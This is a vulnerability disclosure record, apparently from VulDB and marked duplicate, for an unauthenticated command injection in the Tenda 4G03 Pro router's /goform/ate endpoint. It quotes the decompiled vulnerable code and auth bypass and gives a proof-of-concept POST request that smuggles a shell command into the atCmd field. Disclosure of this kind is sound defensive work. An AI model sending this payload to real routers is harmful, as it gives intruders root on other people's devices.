| Title | Tenda Tenda 4G03 Pro V1.0 V04.03.01.53 OS Command Injection |
|---|
| Description | Tenda 4G03 Pro V1.0 /bin/httpd /goform/ate unauthenticated command injection
The /goform/ate endpoint in /usr/sbin/httpd of Tenda 4G03 Pro V1.0
firmware V04.03.01.53 passes the HTTP parameter atCmd directly to
td_common_popen() via snprintf() without sanitization. The
authentication handler FUN_00021a54 explicitly bypasses all security
checks for this endpoint when the admin password is unset, which is
the factory default state. An unauthenticated LAN attacker can
achieve root code execution with a single HTTP POST request.
POC:
Vulnerable code (FUN_000268b4 in /usr/sbin/httpd):
__s1 = FUN_0001f104(param_1, "atCmd");
snprintf(acStack_614, 0x1ff, "serial_atcmd at+%s\r", __s1);
td_common_popen(acStack_614, ...);
Auth bypass (FUN_00021a54):
if (strncmp(url, "/goform/ate", 0xb) == 0 &&
DAT_00050f14 == '\0') goto pass_through;
PoC request:
POST /goform/ate HTTP/1.1
Host: 192.168.0.1
Content-Type: application/json
{"atCmd":"ati; id > /tmp/pwned"} |
|---|
| User | CoreNode (UID 96566) |
|---|
| Submission | 03/18/2026 03:13 (19 days ago) |
|---|
| Moderation | 04/04/2026 08:17 (17 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 333199 [Tenda 4G03 Pro up to 04.03.01.44 /usr/sbin/httpd command injection] |
|---|
| Points | 0 |
|---|